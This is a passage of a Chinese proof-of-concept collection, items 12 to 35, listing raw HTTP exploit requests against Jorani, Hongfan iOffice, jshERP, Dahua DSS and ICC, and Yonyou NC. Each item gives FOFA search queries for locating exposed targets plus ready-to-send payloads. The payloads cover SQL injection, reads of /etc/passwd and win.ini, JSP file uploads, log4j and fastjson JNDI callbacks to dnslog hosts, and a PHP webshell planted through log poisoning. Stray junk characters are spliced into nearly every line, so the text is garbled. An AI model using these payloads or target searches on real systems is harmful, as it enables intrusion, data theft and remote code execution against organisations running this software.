* B: O+ _8 C/ a! b- N0 \GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1" N7 Q3 j r/ T9 _2 W1 W
Host: 127.0.0.1
! T; i0 }; Y) {: |Pragma: no-cache0 ^: w2 P# f+ i8 s; q' X
Cache-Control: no-cache
; \+ S4 Y! b) [Upgrade-Insecure-Requests: 1- Z) B1 @' _5 R9 F$ \# T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ u' X# G U/ b( j, l5 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 b: f% _) i# d$ ^* C% o. Z" g' U6 ?Accept-Encoding: gzip, deflate/ u+ ^2 j2 D1 R# ^' o
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ k& g7 `0 @; N5 hConnection: close( `& S( ]: T9 \
, }( O7 H2 @4 W3 _* C! u# Y% a4 _ A5 p
12. Jorani < 1.0.2 远程命令执行 f9 P! m% V% @
FOFA:title="Jorani"9 \4 p4 {' d, R! m! M
第一步先拿到cookie
# M$ f! g& E: I$ ^GET /session/login HTTP/1.1
& h1 `; j; e, y; A* B& c6 q4 Z, NHost: 192.168.190.30
2 Z/ |( H: z9 z/ u% mUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36) P6 H4 L+ j Q: P
Connection: close$ J x1 J- [" `6 ?! N3 N; C
Accept-Encoding: gzip
4 J( t! [0 N0 p6 e2 W% q6 c/ y' w* o! G6 \4 i+ y) Y! O& ?; v4 F4 I
) u, x* W8 P4 ^0 J2 B8 G; q. C
响应中csrf_cookie_jorani用于后续请求6 L" e1 U+ Z+ D& T" ~
HTTP/1.1 200 OK! m) e* A, Y D* F% }0 X
Connection: close
! M8 q ^: ]/ H% T' E2 }, \3 L3 ~Cache-Control: no-store, no-cache, must-revalidate1 o# l- F5 {7 j1 R5 S# ~' {# L
Content-Type: text/html; charset=UTF-8
# H9 Z6 P# _% }9 xDate: Tue, 24 Oct 2023 09:34:28 GMT
/ v1 x! o/ V% x- M# n9 k- vExpires: Thu, 19 Nov 1981 08:52:00 GMT
/ r' F% u" Y" V# Q9 D; R# tLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
% [1 q4 @$ ^5 e( f% Y& e$ C: a# dPragma: no-cache
: ~% e& N$ K `' D. TServer: Apache/2.4.54 (Debian)- u9 p S& @ B8 w1 V E
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/: S2 p3 @" k" ?# f7 K
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
3 L" v6 [9 k! e2 |5 |Vary: Accept-Encoding& p4 U3 S- ]. |& @8 c3 h
! Y- U4 i+ J( I: _! |$ v1 i
/ F( g0 F+ a. g$ x' i! W7 {
POST请求,执行函数并进行base64编码
9 v5 k& G$ s$ _4 F) E. }# d! XPOST /session/login HTTP/1.1! d% V$ Y, P/ ]" |- q7 m
Host: 192.168.190.305 \3 T. _3 n: L t; p% [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% f' d, @: ^( c- d* o
Connection: close5 v' l5 R1 r9 D: q$ L8 G# U
Content-Length: 2523 Q4 i) b% `4 O. _) E
Content-Type: application/x-www-form-urlencoded
# \. k! Y* L& Q. u, u" PCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r5 y% r! h7 N0 z8 B
Accept-Encoding: gzip
8 a1 L* H; J& O% i& c9 r* e4 k h0 h6 x/ O4 c
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor& D C$ |: P9 D& k. c% g8 A
1 s) O" z, J* [0 L# E, d; G B: A) V
! A, ?# N. y4 J! h" y" f0 Q
) ?+ ~3 ?+ {# b. ]0 H8 V向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
5 ` ~$ c5 w9 qGET /pages/view/log-2023-10-24 HTTP/1.1! E1 n3 U' J5 K0 Q- a
Host: 192.168.190.30
7 O8 ]" r; F7 k( U8 h& H8 q2 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 \) Q) ~- F# pConnection: close
; E$ a# i0 Z7 Q. E% [6 P1 MCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r G% {8 R# J4 Y5 ] x
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
7 a" p" z, r. `& C2 h- v: z- |X-REQUESTED-WITH: XMLHttpRequest
4 B2 l" g9 B! MAccept-Encoding: gzip
& k" N" i9 U% C4 H5 J
2 v" M7 |/ h* `1 `9 I. s ^& l4 N, k7 T4 W
13. 红帆iOffice ioFileDown任意文件读取) v# n* T) O0 j9 N' ~
FOFA:app="红帆-ioffice"
; J2 Y& I, J {8 C/ ?GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1$ {5 H3 v8 D- i l
Host: x.x.x.x7 A: ], I' f# i2 W7 ~- e4 s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' [: m: a1 q, |& C& y5 \
Connection: close
) m* W5 K* ^) YAccept: */*, i- O5 I- h' z( Y& ~) z
Accept-Encoding: gzip
! B9 D v7 R& O5 S; t/ K: U& j+ [% k1 v* z& K# z ?
$ j/ X' c9 k a0 U14. 华夏ERP(jshERP)敏感信息泄露7 E* ?) ~$ q$ X+ M3 i r, n! S
FOFA:body="jshERP-boot"( t$ C' J- b1 Q5 D) V4 g% U
泄露内容包括用户名密码9 Z. U: c& b3 F( M( L
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
2 R+ s( C: T l7 L* j9 WHost: x.x.x.x9 B) j: O7 t: K$ @ @3 d5 Y% Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
/ w6 y: }1 D7 F- ZConnection: close
& y5 v6 [+ v5 M$ L3 m5 wAccept: */*
2 ~; e$ `6 [0 j( E* B4 ?6 B- PAccept-Language: en
( R) u' K* E1 Q MAccept-Encoding: gzip& m3 o+ Y2 E0 u
+ a3 r' u& ?4 T- ]
3 r) f3 R# Y7 y( {7 N) L15. 华夏ERP getAllList信息泄露
" U5 S* x& L2 z- A0 dCVE-2024-04902 D9 c2 h9 L, U
FOFA:body="jshERP-boot"( H& P1 [! I, |! z8 l
泄露内容包括用户名密码
0 ~0 P/ A7 r! R; R7 [GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1/ `* y; u' c2 u" }! Q! {5 j, U7 R N/ g
Host: 192.168.40.130:100. Z% T# r4 Z# x$ n/ H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- y" V# g5 K9 u r' pConnection: close
+ {* e' i1 Y9 f% L9 ?Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
* k6 W% P5 Y4 p* F/ O' M1 IAccept-Language: en2 b* {9 E; J0 {0 f4 @6 A; t
sec-ch-ua-platform: Windows% ?5 F' ]- C- r* U) Y/ p- s
Accept-Encoding: gzip* d0 `) Q* J8 H
, C C1 k' f. x$ M( [1 g$ ^# n
7 L) A" s1 w& m
16. 红帆HFOffice医微云SQL注入# T4 F, x( Q( z9 b& q* A: C
FOFA:title="HFOffice"- a6 K1 q P% @* |& d" U
poc中调用函数计算1234的md5值
* t6 m" `, c2 iGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
' U# F3 T" }$ m$ v9 vHost: x.x.x.x) n& e7 f0 R: J: F0 F5 R, ]3 L
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
) S' m) b& [% c+ nConnection: close
( N9 e1 R7 R, }& `Accept: */*; ]$ d8 \, V _/ B w9 a
Accept-Language: en
$ a% d. l& }7 L; e! I5 qAccept-Encoding: gzip, m' ]: e/ Q) N. x, }
- I2 a) \ }( d% a. `& y* c- ^* F6 b- }/ q
17. 大华 DSS itcBulletin SQL 注入; _' b0 A$ ]# p* Y+ y
FOFA:app="dahua-DSS"
& ]3 Q; @9 s' y# {POST /portal/services/itcBulletin?wsdl HTTP/1.1$ t0 J8 }( h9 x. j! ?
Host: x.x.x.x0 D1 ^5 ^: F+ O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 b* t/ Y0 L- a {Connection: close
m. l7 j9 `4 K [ xContent-Length: 345
9 ]( R; S& w" j& D$ T1 T6 N$ dAccept-Encoding: gzip1 \ X- \( z+ \
, {# D/ r7 W- b1 I7 e; ?<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>+ r! F' `5 d: i$ Z0 T
<s11:Body>
- t# S' m$ u6 O* N; W4 p+ y <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>+ F# k5 q( [5 m+ r( c
<netMarkings>/ t8 [4 p( N/ F! q% ?
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1# j9 C- R! Q6 ], V9 y, V8 o
</netMarkings>8 D4 Y; G# J: R: `( j/ ?' {
</ns1:deleteBulletin>
6 j- q2 I/ ]% G1 }1 P/ v: W </s11:Body>
4 i, e! k0 f+ @9 G) j</s11:Envelope>8 O- t$ ^1 \: q" K* z, P
2 t( l% M; L8 a9 n4 w6 o- U
, j8 ~& @9 l' W {
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露5 D" ]6 S; z& r& C/ Y
FOFA:app="dahua-DSS"& d8 l5 n( d0 w% _$ J
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
; q" ?3 }- D8 x" b& y1 VHost: your-ip2 u3 F) j& r+ V6 R) V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 D f$ \6 M4 |, c# F* t# J( V3 }Accept-Encoding: gzip, deflate
: R; x! b; M" u5 NAccept: */*
, d+ M. r5 \' k) \, D2 u/ _Connection: keep-alive) \" w- M8 w' R* J" W5 q
9 R8 q. e" M6 ^! R
$ Y& l" n5 ]8 I0 F% q
# m+ p0 i8 f, Z% b19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入# ]' I% L7 ~' S& }
FOFA:app="dahua-DSS"
1 C1 V- d( Y. D( @, U+ o5 aGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
3 I7 d1 H0 C9 F: @. s4 vHost:
8 J6 e6 N! ^9 ~( ]# BUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% h' V5 ]: r6 sAccept-Encoding: gzip, deflate
2 b$ C5 c3 b7 Z% Z# _* k' ~Accept: */*+ M2 ^ \" `) R; k
Connection: keep-alive1 R; M# _ x v, X6 X
^- Z! y' @% I5 D# V" ?- z, K3 N& x
" Z$ o, U3 W$ \& A20. 大华ICC智能物联综合管理平台任意文件读取
( w' B x7 A# N& G. y, `FOFA:body="*客户端会小于800*"
( |/ _ y! N. \; ~7 T `' fGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
0 F0 J* d6 V7 s3 h7 o kHost: x.x.x.x$ Q7 g" Q, |$ K
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 n! ~. X7 f% `1 C4 W: _% T% Y
Connection: close
. j6 l$ a: U. d9 U! Z: x2 ?8 WAccept: */*
+ \3 I, ]8 O' L0 m' UAccept-Language: en% O9 Z. a# _: z; H+ K
Accept-Encoding: gzip( Z/ H# z/ o c$ L1 l/ j
9 a3 x+ S" q5 s! |
" I5 c9 G/ y$ ?) @" T- F6 J21. 大华ICC智能物联综合管理平台random远程代码执行
9 T; T5 ~5 F3 [FOFA:icon_hash="-1935899595"
7 O1 Y" J5 X: f5 p" d5 GPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
$ C3 {+ H% W) z- o, v( k1 `Host: x.x.x.x
- C' K1 Q& k! Q8 l- H' D9 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, j4 ?' d+ N0 [( w% T! gContent-Length: 161
, i/ ?+ v5 `4 v. eAccept-Encoding: gzip( H. W. d; T: F5 N& X; e5 z" i. p
Connection: close; g8 K/ W1 r! e2 z
Content-Type: application/json;charset=utf-8
' o: ]% X2 B! ]2 G1 l5 r
2 K, M" |5 L, N% _% ]9 ]{
u3 ~0 _" X- N+ o4 L3 }"a":{
+ N% x; r* g8 y0 ]; l. T "@type":"com.alibaba.fastjson.JSONObject",
% N0 r$ r! ]/ a1 K' j {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
7 e7 g6 H- S2 U" ~8 p( i }""
' ]( h- a5 B( }/ G# C4 j/ g; d}7 Y. k( E I5 ?$ d8 ?2 L
) `' [/ C e- N$ e7 c1 W: [1 y* x1 g4 D6 G
22. 大华ICC智能物联综合管理平台 log4j远程代码执行( W+ Q& a5 h; [6 R$ p! Y Z* E
FOFA:icon_hash="-1935899595"1 D* J& K( {& T d$ D4 q- d
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
S3 @8 N2 p& j' k2 L& nHost: your-ip
% i7 @$ B. M+ |. ?5 ?6 W, T/ RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 H. g/ K" U. T: _Content-Type: application/json;charset=utf-8- `/ l, r( P) y# i
8 y: P- b( f% W& l- W
{
0 ]! s3 o9 }+ |5 }3 |/ h"loginName":"${jndi:ldap://dnslog}"
: ^. {0 L7 G+ E, x}" M% L+ H0 P2 S% ^1 ~
4 p2 ]9 v7 f" F% D$ U$ ]! f8 ~9 H$ W1 o; D% A* n
) ?6 Y( B8 ^! ^( E1 w23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
: a# A4 W% W# @2 T: {( GFOFA:icon_hash="-1935899595"7 g) { B/ U) H
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 ]( h+ N% c- S V( N6 t1 yHost: your-ip
( c4 P- W% n+ u& l( ^$ p3 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 s ~, C9 m8 r/ q6 b, q H _8 X- [
Content-Type: application/json;charset=utf-82 u+ G; Y, P* I& J
Accept-Encoding: gzip; ^4 c4 B* J6 R& c
Connection: close4 {0 @3 I e3 m
8 s% P7 y5 [! Z, Q{# @; V, Q- I% Y- ]3 p- S( J
"a":{+ I7 h8 ^2 }) j( ~5 U/ {$ J! i
"@type":"com.alibaba.fastjson.JSONObject",+ r- t9 u, M5 n9 a- _9 ` |
{"@type":"java.net.URL","val":"http://DNSLOG"}
6 ~. ?- C- e$ J: ?: W. X, ~# f" P' H }""/ k- ]' ~- r4 X4 g$ U
}, t3 T, K1 i/ @: T2 L$ e
- D( D% n5 i3 _2 d2 C1 S
3 ~8 s( y+ [' p( O7 p8 M/ I
24. 用友NC 6.5 accept.jsp任意文件上传5 p3 i3 p- Y/ d# T
FOFA:icon_hash="1085941792"
" R, S: R: N/ h. n0 j3 FPOST /aim/equipmap/accept.jsp HTTP/1.1
3 g2 i2 R7 ]& F2 N7 p" C, uHost: x.x.x.x
0 r' p J; @+ \9 U2 B& rUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36% d3 _+ ^! s5 ]' R% y) i: x- b. \
Connection: close! s9 z/ n5 E% a7 E% `
Content-Length: 449
/ e8 h9 K' Z: v% g B) i' ?5 {9 UAccept: */*4 G3 i% l9 N1 r/ L0 D
Accept-Encoding: gzip# o z, c5 i$ J3 N. h! ~
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
3 Z/ v9 L% ~! Y1 Y6 J7 ~/ G1 v7 w3 z* F9 j* ?
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc/ j9 S( W1 C; C6 ^2 `1 x
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"8 v0 A$ p5 L0 h5 }6 |+ C
Content-Type: text/plain0 x7 I6 L' ^9 T( @6 \ `0 ]
- f+ o+ b( S7 `4 w/ n
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>( T4 A! s* L4 M: u" T' M0 M
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% o r* R# `) ]6 g! L+ P& j' iContent-Disposition: form-data; name="fname"6 Z1 |2 i) `- a! X3 P! H" {' A! i8 {. k" |
R# v' M0 X7 N2 W* ?
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp; O/ [! S- b+ u. v
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--5 T/ b# o( d- ?5 O+ g
/ P5 R. Z* \( K1 [/ I' l' M
" ]: U; c, r# b4 V. {" c5 x
25. 用友NC registerServlet JNDI 远程代码执行
* A3 t1 P1 K8 O9 x# WFOFA:app="用友-UFIDA-NC"3 y) x+ r# D2 \! b: t. h @
POST /portal/registerServlet HTTP/1.1
' I' A3 S$ c5 s1 U0 U) K9 m- qHost: your-ip
$ ~" y' ?( E, I5 c% l: {" s6 D* lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$ r+ y* Z0 s$ s' K. Z0 H9 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
9 q0 |; y' W+ h& ~Accept-Encoding: gzip, deflate) D) }. S6 v6 [6 s
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
6 V6 H) u7 T1 g [ qContent-Type: application/x-www-form-urlencoded
& z- E6 D5 L, H2 \$ B& h' m( G8 x
type=1&dsname=ldap://dnslog8 e1 M% p; c2 k/ o# `
2 s- t! t6 Z9 |2 [* H8 G+ s" \+ N. \, C1 j
# b+ [9 k. _7 L5 C! J0 N26. 用友NC linkVoucher SQL注入
3 z( X4 I" Q: y# i: i3 |8 kFOFA:app="用友-UFIDA-NC"
: N1 I' p% k4 V5 oGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 D9 q# B( L: l- z- `Host: your-ip
5 E6 {* i, N8 a2 u- }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 E9 H* L5 H0 f! E8 Y7 j5 `
Content-Type: application/x-www-form-urlencoded2 l' I% x, A# a
Accept-Encoding: gzip, deflate1 [/ J. K/ p2 |% E' O+ x2 Q q+ m
Accept: */*( t3 [2 \0 {* K7 q2 ]: _) d( u
Connection: keep-alive
0 |( I' L4 W' j$ F* l) I: l4 y9 _ d9 O2 X
& H) s( _3 y9 a" q% [
27. 用友 NC showcontent SQL注入# b# m+ x' n. u& j
FOFA:icon_hash="1085941792"" s. |* Q7 ` @
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
( u% U. r. f7 y; T# K/ wHost: your-ip3 \! F( C$ C: U8 h- |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 S) o& y( ^' S1 i0 ^+ [. G3 O
Accept-Encoding: identity; G# P1 F* ~' _8 p. i' p
Connection: close" @$ b5 D6 g( [7 t! m
Content-Type: text/xml; charset=utf-8: s: z: r$ w3 o9 y) x% m! o( S
( @) d0 f- |/ j) X9 M. t3 ]8 j) N. y! \ N5 }* M1 F
28. 用友NC grouptemplet 任意文件上传
( l3 c, l4 v$ W2 M, }FOFA:icon_hash="1085941792"4 I4 z' A/ p" F( s& q. ^7 Z" w
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
" C0 Q# d5 {9 b' S, h' Y& O( dHost: x.x.x.x A4 |& f+ G( E) C' y* J( X- c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
$ a6 |% S8 q: ~; g- \( j/ P Q: ]Connection: close. m6 K+ s2 y% ?# x9 f8 c6 }. K1 X
Content-Length: 2687 ?2 B* n4 F: d" |2 ^$ k+ r
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
. z8 `! A, D5 C# P/ }6 [% QAccept-Encoding: gzip5 p: `# h$ W0 n4 F3 Y$ d. J; l( r# Y
2 S3 o$ k0 A2 b1 I$ j' C
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% r U* F( y# ^. mContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
% N. y& Z' i% f) x8 KContent-Type: application/octet-stream+ s5 v q; o$ d2 P' t
$ Y# e) _7 D2 q! ^8 h' V+ e, {' v
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
8 P# R1 j# [1 w1 S. S+ }------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk-- k- f' g6 K# C+ @4 w9 N
8 G1 \% O1 o; Z5 N3 _; M8 C9 ?5 b0 ~9 l" X0 ^6 |9 q. @3 |1 m0 [
/uapim/static/pages/nc/head.jsp2 K( |4 r- b! e. G2 v
4 ~, l z# J7 }* J, z9 G
29. 用友NC down/bill SQL注入' ?* x. j3 d6 R5 R9 w
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
! ], z+ L7 T9 D8 p! I, R+ JGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
! D6 ?& i& n9 PHost: your-ip/ k |# G: y2 i9 v M2 g; A5 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 p0 g, z1 _- _
Content-Type: application/x-www-form-urlencoded
: H' a5 w7 l7 ?) _! a7 {Accept-Encoding: gzip, deflate: ^1 b8 B5 |# T4 d: i
Accept: */*
5 k2 f2 F( P8 T: f7 K0 OConnection: keep-alive
. f, e4 Q0 \9 I2 B8 e7 D' k+ z/ C
2 C X2 n8 H: a7 T30. 用友NC importPml SQL注入
! `# t/ i! W, H8 w( x- |% |# lFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
" }3 s! F# ~; ^. j Q, m% K0 H3 t. GPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
* o6 s% m0 m2 c8 Y5 N3 U$ oHost: your-ip
# F2 e$ u5 D) A2 n8 E9 G- ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
+ H( p; h* c# d3 [# w; ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
* d- S. N0 v/ ` l2 [1 K) y* YConnection: close
8 |$ e2 ]! n8 s* D9 L# T( h: m# i" P/ m6 I% I4 ]. q
------WebKitFormBoundaryH970hbttBhoCyj9V( q7 E5 T: V" v5 f
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"1 R" {2 D; m; _, j. C
Content-Type: image/jpeg' k- g f7 T8 T) X) m
------WebKitFormBoundaryH970hbttBhoCyj9V--+ H0 Z [, v+ V4 U- \
/ @9 Q" ]: O1 ~3 F. m" S/ k1 r% C% L; r, @3 U/ ? ~
31. 用友NC runStateServlet SQL注入
l! z* I0 U/ f* v! I0 Z7 x4 j6 gversion<=6.5
3 s( m3 y- P# _& V! s0 B) A' AFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- e$ v/ }" |3 P6 K9 uGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( H4 |* @& f6 ]/ BHost: host
; F$ c' ^% V8 S1 A- ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.365 [ t# M9 U: H+ _( D! h
Content-Type: application/x-www-form-urlencoded
/ P- }3 }0 ]7 N, K0 m* K
1 r: W; ] [) [, v2 f' W/ }+ B- N' n% o% @
32. 用友NC complainbilldetail SQL注入
6 M% }8 @& r( Q' a2 p$ Rversion= NC633、NC65
( p7 c% n2 m% V/ J. |9 ]/ \FOFA:app="用友-UFIDA-NC"
, k( N* G* d% z: z9 ^5 A9 }GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.18 G/ z( ?5 A+ d, P$ m! b7 P
Host: your-ip
! h$ j3 l, W3 x- `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! [8 i$ o' U; Q& P, X: L. [
Content-Type: application/x-www-form-urlencoded
: m" _6 |" v& ]0 M+ b3 UAccept-Encoding: gzip, deflate
0 @9 C% D5 }# }; }) XAccept: */*
- y0 R0 F* x$ K2 w' xConnection: keep-alive
# Y- D$ x9 e- G: J: t5 X9 N6 W$ O) C1 _ N1 T# C
$ d5 R+ x! E" W( ]8 h3 Y
33. 用友NC downTax/download SQL注入
# O$ I+ ?5 \ O+ Z) y4 M0 B" A# ^: }version:NC6.5FOFA:app="用友-UFIDA-NC"
, W* E/ [2 A1 V2 o' `) qGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- G; m2 T. b1 k( G% K* bHost: your-ip: c J7 |. G- b3 t+ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ ^/ h. `& U* L' n' Y$ T0 k" b4 |0 r
Content-Type: application/x-www-form-urlencoded
- { o' C6 K4 u. wAccept-Encoding: gzip, deflate4 l' B4 a5 g9 D9 W w
Accept: */*
. O% j r+ S e; E4 eConnection: keep-alive
% `1 B H p! j. R5 h/ X# g/ U
# f- p. p$ t6 ^) K3 ]1 i8 J* A2 i$ G( x" ?
34. 用友NC warningDetailInfo接口SQL注入1 ~ M2 U6 @% v8 L* i" n3 i: T4 K. O! c
FOFA:app="用友-UFIDA-NC"
3 m; G9 S' B6 H8 }! ~9 y* x$ E* m0 dGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.13 P) T2 h( j c. j6 _) l
Host: your-ip& B4 ~7 n+ r! _# j9 n& O' L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' {$ n% r% y8 j& D5 [ c
Content-Type: application/x-www-form-urlencoded% Z( C5 X9 g( i' z6 M2 F- G
Accept-Encoding: gzip, deflate, G t; Y) d" f$ C% f( E
Accept: */*
' D2 A6 e/ z: r& U7 HConnection: keep-alive
. U+ r: P! b& j' x- _# | \; W0 L$ c0 T8 G
3 _( L8 e- r8 `+ t
35. 用友NC-Cloud importhttpscer任意文件上传
